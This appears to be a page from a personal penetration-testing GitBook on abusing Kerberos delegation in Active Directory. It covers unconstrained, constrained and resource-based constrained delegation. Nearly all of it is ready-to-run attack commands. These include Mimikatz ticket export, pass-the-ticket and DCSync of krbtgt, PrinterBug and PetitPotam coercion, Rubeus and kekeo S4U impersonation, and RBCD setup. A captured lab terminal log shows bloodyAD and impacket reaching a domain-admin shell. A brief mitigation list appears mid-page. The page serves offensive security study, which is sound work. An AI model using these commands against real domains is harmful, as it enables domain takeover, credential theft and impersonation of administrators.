Trustee and Resource Delegation

Exploiting Delegation

LogoThreats & Research Archives - F-Secure BlogF-Secure Blog
https://www.guidepointsecurity.com/blog/delegating-like-a-boss-abusing-kerberos-delegation-in-active-directory/www.guidepointsecurity.com

Delegations

LogoGitHub - TheManticoreProject/Delegations: A tool to work with all types of Kerberos delegations (unconstrained, constrained, and resource-based constrained delegations) in Active DirectoryGitHub

ADeleginator

LogoGitHub - techspence/ADeleginator: A companion tool that uses ADeleg to find insecure trustee and resource delegations in Active DirectoryGitHub

NXC

nxc ldap 192.168.56.11 -u eddard.stark -p FightP3aceAndHonor! --find-delegation

https://x.com/al3x_n3ff/status/1857153795949559875?t=3iN0A-aTMN58zD0O7rIIlA&s=03

SharpADWS

LogoGitHub - wh0amitz/SharpADWS: Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS).GitHub

Unconstrained Delegation

Unconstrained Delegation: allows the first hop server to request access to any service on any computer in the domain

Getting Domain Admin with Kerberos Unconstrained Delegation
Active Directory Security Risk #101: Kerberos Unconstrained Delegation (or How Compromise of a Single Server Can Compromise the Domain)Active Directory Security

Discovery

  • PowerView

Get-DomainComputer -UnConstrained

  • AD Module

Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Compromise the server where unconstrained delegation is enabled

Wait for a DA to connect then

Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Reuse DA token

Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\[****]-*****-Administrator@krbtgt-DOMAIN.LOCAL.kirbi"'

Trick a high user to connect to a machine with Unconstrained Delegation ? Printer Bug

MisconfigurationPrint Spooler
LogoMS-RPRN abuse (PrinterBug)The Hacker Recipes

Printerbug also works across a Two-way forest trust with TGT Delegation enabled - See Trusts

Capture the TGT of dc$ by using Rubeus on victim server

Rubeus.exe monitor /interval:5 /nowrap

Printerbug - Run MS-RPRN.exe

LogoGitHub - leechristensen/SpoolSample: PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.GitHub
LogoPrecompiledBinaries/SpoolSample.exe at master · jtmpu/PrecompiledBinariesGitHub
MS-RPRN.exe \\dc.domain.local \\vicitm.domain.local

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

Or with PetitPotam

LogoGitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.GitHub
.\PetitPotam.exe victim-hostname

# Victim host
Rubeus.exe monitor /interval:5 /nowrap

On Linux, use Coercer

SMB (445, 139) / RPC

ShadowCoerce or DFSCoerce can also be used

LogoGitHub - ShutdownRepo/ShadowCoerce: MS-FSRVP coercion abuse PoCGitHub
LogoGitHub - Wh04m1001/DFSCoerceGitHub

Copy the base64 encoded TGT and remove extra spaces before use it

Rubeus.exe ptt /ticket:<Base64>

Or use Invoke-Mimikatz:

[IO.File]::WriteAllBytes("C:\AD\Tools\USDC.kirbi",
[Convert]::FromBase64String("ticket_from_Rubeus_monitor"))
Invoke-Mimikatz -Command '"kerberos::ptt C:\path\to\ticket.kirbi"'

Run DCSync

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
DCSync

Mitigation

The following security controls should be implemented to mitigate unconstrained delegation:

  • Ensure computer objects are not configured for unconstrained delegation. If delegation is required for a computer object, use resource-based constrained delegation instead.

  • Ensure privileged user objects are configured as ‘sensitive and cannot be delegated’. This can be configured by using the ‘Account is sensitive and cannot be delegated’ option on the user object in Active Directory Users and Computers.

  • Ensure privileged user objects are members of the Protected Users security group. Members of this security group cannot be delegated.

  • Disable the Print Spooler service on Domain Controllers. This prevents the Print Spooler service from being used to coerce a Domain Controller into authenticating to another system.

https://www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/detecting-and-mitigating-active-directory-compromises?s=03

Constrained Delegation - Protocol Transition

Constrained Delegation: allows the first hop server to request access only to specified computers

Service for User (S4U) used to impersonate a user

S4U2self: allows a forwardable TGS to itself on behalf of a user - TUSTED_TO_AUTHENTICATE_FOR_DELEGATION

S4U2proxy: allows a service to obtain a TGS to a second service on behalf of the user - msDS-AllowedToDelegateTo contains a list of SPN to which the token can be forwarded

Discovery

  • PowerView

Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

  • AD Module

Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Abusing with kekeo

password or NTLM/AES keys required

  1. Request a TGT

kekeo# tgt::ask /user:victim_user /domain:domain.local /rc4:<ntlm_hash>

  1. Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL
kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:cifs/mssql.domain.LOCAL|HTTP/mssql.domain.LOCAL

  1. Inject the ticket

Invoke-Mimikatz -Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'
ls \\mssql.domain.local\c$
Invoke-Command -ScriptBlock{whoami} -ComputerName mssql.domain.local

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_user /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:CIFS/mssql.domain.LOCAL /ptt
ls \\mssql.domain.local\c$

The delegation occurs not only for the specified service but for any service running under the same account. No validation for the SPN specified

With rc4

Rubeus.exe s4u /user:appsvc /rc4:<ntlm_hash> /impersonateuser:administrator /msdsspn:CIFS/mssql.domain.local /altservice:HTTP /domain:domain.local /ptt

winrs -r:umssql-hostname cmd.exe

Abusing with kekeo

password or NTLM/AES keys required

  1. Request a TGT

kekeo# tgt::ask /user:victim_machine_account$ /domain:domain.local /rc4:<ntlm_hash>

  1. Request a TGS

kekeo# tgs::s4u /tgt:<tgt_from_step_1>.kirbi /user:Administrator@domain.local /service:time/dc.domain.LOCAL|ldap/dc.domain.LOCAL

  1. Inject the ticket

Invoke-Mimikatz -Command '"kerberos:ptt <tgs_from_step_2>.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'

Abusing with Rubeus

Request TGT and TGS in a single command

Rubeus.exe s4u /user:victim_machine_account$ /aes256:<aes_key> /impersonateuser:Administrator /msdsspn:time/dc.domain.LOCAL /altservice:ldap /ptt
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"

Persistence - msDS-AllowedToDelegateTo

Persistence

Resource-based Constrained Delegation

Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active DirectoryShenanigans Labs
Logo(RBCD) Resource-based constrainedThe Hacker Recipes

Instead of SPNs on msDS-AllowedToDelegatTo on the front end service, access is control by a security descriptor of msDS-AllowedToActOnBehalfOfOtherIdentity (visible as PrincipalsAllowedToDelegateToAccount) on the resource/service

The service administrator can configure this delegation whereas for other type SeEnableDelagation privs required - by default only DA

Two privileges needed to abuse RBCD:

  1. Write permissions over the target service

  2. Control over an object which as SPN configured (like admin access do a domain joined machine or ability to join a machine to domain - ms-DS- MachineAccountQuota is 10 by default)

Write Permission

Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'}

Exploit

Configure RBCD

$comps = 'computer1$','computer2$'
Set-ADComputer -Identity victim -PrincipalsAllowedToDelegateToAccount $comps

Extract AES keys for computerx$

Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

Use the AES key and access vicitm as ANY user we want

Rubeus.exe s4u /user:computer1$ /aes256:<aes_key> /msdsspn:http/victim /impersonateuser:administrator /ptt
winrs -r:victim cmd.exe

With Impacket

L.BIANCHI_ADM is a DA

┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb --dc-ip 10.10.11.45 -d "DOMAIN.HTB" -u user -p 'password' -k add groupMember "DELEGATEDADMINS" "SVC_LDAP"
[+] SVC_LDAP added to DELEGATEDADMINS
                                                                                                                                                                          
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ ./bloodyAD.py --host dc01.domain.htb -d "DOMAIN.HTB" --dc-ip 10.10.11.45 -k set object "SVC_LDAP" servicePrincipalName  -v "cifs/fake"
[+] SVC_LDAP's servicePrincipalName has been updated
                                                                                                                                                                          
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getTGT domain.htb/svc_ldap:password -dc-ip dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_ldap.ccache                                                                                                  
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=svc_ldap.ccache
                                                                                                                                                                          
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-getST -spn 'cifs/dc01.domain.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'domain.htb/svc_ldap:password'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating L.BIANCHI_ADM
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
                                                                                                                                                                          
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ export KRB5CCNAME=L.BIANCHI_ADM@cifs_dc01.domain.htb@DOMAIN.HTB.ccache
                                                                                                                                                              
┌──(kali㉿kali)-[~/Desktop/bloodyAD]
└─$ impacket-wmiexec -k -no-pass DOMAIN.HTB/L.BIANCHI_ADM@dc01.domain.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type Users\Administrator\Desktop\root.txt

Constrained Delegation - Kerberos Only

Leverage RBCD to abuse Kerberos Only configuration

Enumeration

# AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -PropertiesmsDS-AllowedToDelegateTo

Create a new machine account

https://github.com/Kevin-Robertson/Powermad

Powermad.ps1 New-MachineAccount -MachineAccount studentcompX

Configure RBCD

# On victim host
Rubeus.exe asktgt /user:victim$ /aes256:<aes_key> /impersonateuser:administrator /domain:domain.local /ptt /nowrap

# With AD Module
Set-ADComputer -Identity victim$ -PrincipalsAllowedToDelegateToAccount studentcompX$ -Verbose

Get TGS

# Get hash
Rubeus.exe hash/password:P@ssword@123

Rubeus.exe s4u /impersonateuser:administrator /user:studentcompX$ /rc4:<rc4_hash> /msdsspn:cifs/victim.domain.local /nowrap

Request a new forwardable TGS

Rubeus.exe s4u /tgs:<base67_tgs_from_previous_step> /user:victim$ /aes256:<victim$_aes> /msdsspn:cifs/mssql.domain.local /altservice:http /nowrap /ptt

winrs -r:mssql.domain.local cmd.exe

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousAD FSNextLAPS

Last updated